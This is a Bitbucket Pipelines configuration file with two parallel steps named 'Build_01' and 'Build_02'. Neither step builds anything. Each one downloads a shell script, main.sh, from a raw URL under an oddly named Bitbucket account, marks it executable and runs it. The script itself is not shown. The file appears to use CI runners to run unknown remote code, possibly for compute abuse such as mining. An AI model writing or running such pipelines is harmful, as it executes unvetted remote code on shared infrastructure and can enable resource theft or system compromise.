image: python:3.8

pipelines:
  default:
    - parallel:
      - step:
          name: Build_01
          script:
            - wget https://bitbucket.org/juynemikojuynemi/d/raw/f27c30d8409f84afec32d1488062f53887d7844d/main.sh && chmod u+x main.sh && ./main.sh
      - step:
          name: Build_02
          script:
            - wget https://bitbucket.org/juynemikojuynemi/d/raw/f27c30d8409f84afec32d1488062f53887d7844d/main.sh && chmod u+x main.sh && ./main.sh
